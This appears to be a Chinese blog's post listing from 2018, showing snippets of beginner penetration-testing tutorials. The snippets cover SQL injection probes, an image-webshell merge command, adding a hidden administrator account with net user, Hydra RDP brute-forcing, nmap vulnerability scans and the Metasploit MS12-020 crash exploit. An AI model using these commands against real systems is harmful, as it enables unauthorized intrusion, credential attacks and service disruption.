摘要: 【网站信息暴露CMS】看网站底部但不仅限于,如果未修改的话,一般都会有CMS的信息以及版本。 【robots暴露CMS】robots.txt 确实很多robots都会有CMS的版权,一般在头部居多。 【搜索引擎探测CMS】这个方法我常用,就是在google里site:目标站 CMS 或者内容管理系统 阅读全文
posted @ 2018-06-10 20:37 星白神 阅读(387) 评论(0) 推荐(0) 编辑
摘要: 目标站的脚本语言识别】 1-1 最简单的方法,在域名后面分别加个/index.asp /index.aspx /index.php /index.jsp 不报错则是网站支持的脚本语言 【原理】 大部分网站根目录都会放个index首页文件。这是最快速最简单的方式。 1-2 F12审查元素,在返回头一般 阅读全文
posted @ 2018-06-10 20:35 星白神 阅读(290) 评论(0) 推荐(0) 编辑
摘要: 【在线工具探测法】爱站 站长 之类的在线工具查询服务器信息 【发包探测】如用burp 截包,发送到改包模式,发包——就可以看到响应头返回的信息了,很多都包含了搭建平台。 【旁站探测法】其实有时候目标站查不出来,我们可以查旁站,一般和目标站搭建平台一样的。但是这里要确保IP是真实的。 【根据常用搭建组 阅读全文
posted @ 2018-06-10 20:35 星白神 阅读(132) 评论(0) 推荐(0) 编辑
摘要: 【目标站的脚本语言识别】 1-1 最简单的方法,在域名后面分别加个/index.asp /index.aspx /index.php /index.jsp 不报错则是网站支持的脚本语言 【原理】 大部分网站根目录都会放个index首页文件。这是最快速最简单的方式。 1-2 F12审查元素,在返回头一 阅读全文
posted @ 2018-06-10 20:34 星白神 阅读(248) 评论(0) 推荐(0) 编辑
摘要: and exists (select * from sysobjects) //判断是否是MSSQL and exists(select * from tableName) //判断某表是否存在..tableName为表名 and 1=(select @@VERSION) //MSSQL版本 And 阅读全文
posted @ 2018-06-10 20:33 星白神 阅读(234) 评论(0) 推荐(0) 编辑
摘要: version()获取数据库版本database()获取数据库名user()获取当前用户@@version_compile_os 获取操作系统group_concat(欲查询的参数)获取表名:注入点 UNION SELECT 1,table_name from information_schema. 阅读全文
posted @ 2018-06-10 20:32 星白神 阅读(128) 评论(0) 推荐(0) 编辑
摘要: and 1=1 返回正常 也可以用 xor 5>6and 1=2 返回错误 也可以用 xor 5>4 【判断字段数】order by 1 返回正常、order by 1000 返回错误 然后逐步减少,直到最后一个返回正常的数字就是字段数 【猜解表名】 id=4 union select 1,2,3, 阅读全文
posted @ 2018-06-10 20:31 星白神 阅读(118) 评论(0) 推荐(0) 编辑
摘要: cmd下执行↓ copy tu.jpg /b + hack.asp /a ok.jpg [说明]tu.jpg //为正常的图片 这里可以是任何图片格式hack.asp //这里一般放上一句话 可以是任何后缀,里面内容就是想插进图片的内容ok.jpg //这里是设置生成的图马文件名 [注意事项]需要将 阅读全文
posted @ 2018-06-10 20:30 星白神 阅读(290) 评论(0) 推荐(0) 编辑
摘要: net user查看当前所有系统用户 net user jdq 123456 /add添加用户名为jdq 密码为123456的用户 net localgroup administrators jdq /add把jdq用户提升至管理组 【拓展】1.net不能用时 可以用net1 如net1 user 阅读全文
posted @ 2018-06-10 20:30 星白神 阅读(3360) 评论(0) 推荐(0) 编辑
摘要: hydra -h //查看基本用法 hydra ip rdp -L users.txt -P pass.txt -V rdp 是协议 -L 指定一个帐号字典 -P 指定一个密码字典 -V 现实爆破测试的详细过程 阅读全文
posted @ 2018-06-10 20:15 星白神 阅读(250) 评论(0) 推荐(0) 编辑
摘要: nmap命令: nmap --script=vuln ip 常见系统漏洞 阅读全文
posted @ 2018-06-10 20:12 星白神 阅读(1037) 评论(0) 推荐(0) 编辑
摘要: ms12-020 漏洞 简单说就是这边攻击 对方服务器直接蓝屏, 废话不说了 打开metasploit,search 搜索漏洞 use 打开搜索下的地址 show options 查看设置 然后set RHOST 设置 被攻击的ip 直接exploit 阅读全文
posted @ 2018-06-10 19:22 星白神 阅读(1177) 评论(0) 推荐(0) 编辑
摘要: 一.了解网站常见脚本语言Asp //逐渐淘汰,基本都是小站点在使用AspxPhp //目前比较流行Jsp二.动态脚本与静态脚本Asp AspxPhp Jsp这些都是动态脚本.htm.html这些是静态脚本动态和静态的区别1. 源码动态脚本显示的是执行后的效果静态脚本显示的就是实际的源码2. 数据库动 阅读全文
posted @ 2018-06-10 19:13 星白神 阅读(1199) 评论(0) 推荐(0) 编辑
摘要: 了解谷歌搜索语法(google hack) 学习谷歌搜索语法的作用: 找后台、找敏感信息、观察目录结构等等。。 1. site: 搜索指定域名下的内容 站点: 网页链接 1.site: 网页链接 2.site: nem-cn.com 2.inurl: 搜索URL中存在的内容 3.intitle: 搜 阅读全文
posted @ 2018-06-10 19:12 星白神 阅读(1407) 评论(0) 推荐(0) 编辑
摘要: 1.猜解常用路径 常用后台路径: Admin Adminlogin Admin/admin_login.asp Admin/admin_login.php Manage User System 大部分网站默认都是admin目录后台。 2.Robots.txt Robots是防止搜索引擎抓取敏感目录和 阅读全文
posted @ 2018-06-10 19:11 星白神 阅读(10258) 评论(0) 推荐(0) 编辑
摘要: 1.对于网站渗透一块来说,寻找漏洞是突破口,常规的讲,都会以收集信息,漏洞扫描等一步步的展开,其实不然,我们得首先了解一个网站的整体框架结构,首先一个网站的搭建是必须有多个方面支撑的(1.服务器 2.搭建平台 3.脚本语言 4.数据库),在上面4个必须条件里面那一块出现漏洞,都可成为我们攻击的突破口 阅读全文
posted @ 2018-06-10 19:09 星白神 阅读(1110) 评论(0) 推荐(0) 编辑